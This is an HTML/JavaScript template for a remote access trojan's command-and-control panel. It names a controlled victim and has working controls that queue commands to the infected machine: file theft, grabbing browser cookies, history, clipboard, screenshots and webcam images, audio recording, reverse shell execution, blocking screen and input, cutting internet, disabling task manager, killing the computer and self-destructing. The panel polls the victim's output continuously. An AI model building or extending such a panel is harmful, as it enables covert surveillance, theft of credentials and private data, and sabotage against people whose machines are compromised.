<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>control: {{ u }}</title>
</head>
<body>
    <h1>you are controlling: {{ u }}</h1>
    <hr>
    <h2>filesystem</h2>
    <b>cd</b>
    <form>
        <input type="text" id="cd" placeholder="change directory">
        <button onclick="change_directory()">change</button>
    </form>
    <br>
    <b>ls</b><br>
    <button onclick="list_current_directory()">list current directory</button>
    <br><br>
    <b>download</b>
    <form>
        <input type="text" id="download" placeholder="download file">
        <button onclick="download_file()">download</button>
    </form>
    <br>
    <b>upload</b>
    <form>
        <input type="file" id="upload">
        <br>
        <button type="submit" onclick="upload_file()">upload file</button>
    </form>
    <hr>
    <h2>troll</h2>
    <b>bscreen</b>
    <form>
        <input type="number" id="bscreen" placeholder="duration (s)">
        <button onclick="block_screen()">block</button>
    </form>
    <br>
    <b>binput</b>
    <form>
        <input type="number" id="binput" placeholder="duration (s)">
        <button onclick="block_input()">block</button>
    </form>
    <br>
    <b>psound</b>
    <form>
        <input type="file" id="psound">
        <br>
        <button type="submit" onclick="play_sound()">playsound</button>
    </form>
    <br>
    <b>offnet</b>
    <form>
        <input type="number" id="offnet" placeholder="duration (s)">
        <button onclick="kill_internet()">turn off</button>
    </form>
    <br>
    <b>killpc</b><br>
    <button onclick="kill_computer()">kill</button>
    <hr>
    <h2>spy</h2>
    <b>gcookies</b><br>
    <button onclick="grab_cookies()">grab cookies</button>
    <br><br>
    <b>gip</b><br>
    <button onclick="grab_ip()">grab public ip</button>
    <br><br>
    <b>ghistory</b><br>
    <button onclick="grab_history()">grab history</button>
    <br><br>
    <b>raudio</b>
    <form>
        <input type="number" id="raudio" placeholder="duration (s)">
        <button onclick="record_audio()">record</button>
    </form>
    <br>
    <b>ss</b><br>
    <button onclick="screenshot()">screenshot</button>
    <br><br>
    <b>webcam</b><br>
    <button onclick="webcam()">webcam image</button>
    <br><br>
    <b>cboard</b><br>
    <button onclick="clipboard()">get clipboard</button>
    <br><br>
    <hr>
    <h2>other</h2>
    <b>dtaskmgr</b><br>
    <button onclick="disable_taskmgr()">disable taskmgr</button>
    <br><br>
    <b>disableapp</b>
    <form>
        <input type="text" id="disableapp" placeholder="disable app">
        <button onclick="disable_app()">disable</button>
    </form>
    <br>
    <b>rshell</b>
    <form>
        <input type="text" id="rshell" placeholder="command...">
        <button onclick="reverse_shell()">execute</button>
    </form>
    <br>
    <b>destruct</b><br>
    <button onclick="self_destruct()">self destruct</button>
    <br><br>
    <hr>
    <h2>output</h2>
    <button onclick="clear_output()">clear</button>
    <hr>
    <div id="output"></div>
    <script>
        for (let button of document.querySelectorAll("button")) {
            button.addEventListener("click", function(event) {
                event.preventDefault();
            });
        }
        function add_instruction(list) {
            let json = ["{{ u }}", list];
            fetch("/add_instruction/", {
              method: "POST",
              headers: {
                "Content-Type": "application/json"
              },
              body: JSON.stringify(json)
            });
        }
        function clear_output() {
            fetch("/clear_output/?u={{ u }}");
        }
        function update_output() {
            fetch("/get_output/?u={{ u }}").then(response => response.json())
            .then(data => {
                let output_list = document.querySelector("#output");
                output_list.innerHTML = "";
                for (let instruction_id in data) {
                    let output_elem;
                    if (data[instruction_id][0] == "ss") {
                        output_elem = document.createElement("img");
                        output_elem.setAttribute("src", "data:image/png;base64," + data[instruction_id][1]);
                    } else {
                        output_elem = document.createElement("p");
                        output_elem.textContent = data[instruction_id][1];
                    }
                    output_list.appendChild(output_elem);
                    // decide how to properly display in the future
                }
            });
        }
        update_output();
        setInterval(update_output, 2000);
        /*
        FILESYSTEM:
        [cd] change directory
        [ls] list current directory
        [download] download file
        [upload] upload file
        */
        function change_directory() {
            add_instruction(["cd", document.querySelector("#cd").value]);
        }
        function list_current_directory() {
            add_instruction(["ls"]);
        }
        function download_file() {
            add_instruction(["download", document.querySelector("#download").value]);
        }
        function upload_file() {
            // to be done
        }
        /*
        TROLL:
        [bscreen] block entire screen
        [binput] block input
        [psound] play sound
        [offnet] turn off internet
        [killpc] spawn a process which kills the entire computer
        */
        function block_screen() {
            add_instruction(["bscreen", document.querySelector("#bscreen").value]);
        }
        function block_input() {
            add_instruction(["binput", document.querySelector("#binput").value]);
        }
        function play_sound() {
            // to be done
        }
        function kill_internet() {
            add_instruction(["offnet", document.querySelector("#offnet").value]);
        }
        function kill_computer() {
            add_instruction(["killpc"]);
        }
        /*
        SPY:
        [gcookies] grab cookies: return whatever
        [gip] grab publicip: return string [ok]
        [ghistory] grab history: return whatever (check jabor)
        [raudio] record audio
        [ss] screenshot: return base64 (unless we can return a file, then get an API which screenshots and return the file)
        [webcam] webcam image: return base64, unless above, or whatever CV returns
        [cboard] clipboard: return string [ok]
        */
        function grab_cookies() {
            add_instruction(["gcookies"]);
        }
        function grab_ip() {
            add_instruction(["gip"]);
        }
        function grab_history() {
            add_instruction(["ghistory"]);
        }
        function record_audio() {
            // to be done
        }
        function screenshot() {
            add_instruction(["ss"]);
        }
        function webcam() {
            add_instruction(["webcam"]);
        }
        function clipboard() {
            add_instruction(["cboard"]);
        }
        /*
        OTHER
        [dtaskmgr] disable task manager (keep killing it) (need admin)
        [disableapp] disable certain apps (keep killing, might need admin)
        [rshell] reverse shell [ok]
        [destruct] self destruct
        */
        function disable_taskmgr() {
            add_instruction(["dtaskmgr"]);
        }
        function disable_app() {
            add_instruction(["disableapp", document.querySelector("#disableapp").value]);
        }
        function reverse_shell() {
            add_instruction(["rshell", document.querySelector("#rshell").value]);
        }
        function self_destruct() {
            add_instruction(["destruct"]);
        }
    </script>
</body>
</html>